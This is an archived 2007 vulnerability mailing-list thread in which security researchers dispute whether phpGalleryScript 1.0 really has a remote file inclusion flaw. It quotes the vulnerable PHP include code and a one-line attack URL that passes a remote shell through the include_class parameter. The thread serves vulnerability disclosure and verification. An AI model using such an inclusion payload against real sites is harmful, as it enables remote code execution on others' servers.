[VIM] false: phpGalleryScript 1.0 - File Inclusion Vulnerabilities
rkeith at securityfocus.com
rkeith at securityfocus.com
Tue Apr 10 19:58:13 UTC 2007
dirname("http://milw0rm.com/test") => http://milw0rm.com
Looks valid to me.
--
Rob Keith
Symantec
On Tue, 10 Apr 2007, str0ke wrote:
> init.gallery.php
> #######################3
>
> $inc_path = dirname($include_class);
> require ($inc_path."/class.gallery.php");
> include($inc_path."/config.gallery.php");
> ....
> #######################3
>
> dirname("http://milw0rm.com") == http:
>
> /str0ke
>
> ---------- Forwarded message ----------
> From: z12xxa at gmail.com <z12xxa at gmail.com>
> Date: 9 Apr 2007 23:19:32 -0000
> Subject: phpGalleryScript 1.0 - File Inclusion Vulnerabilities
> To: bugtraq at securityfocus.com
>
>
> vendor url: http://tomex.org/
>
> http://[victim]/php/init.gallery.php?include_class=[SHELL]
>
More information about the VIM
mailing list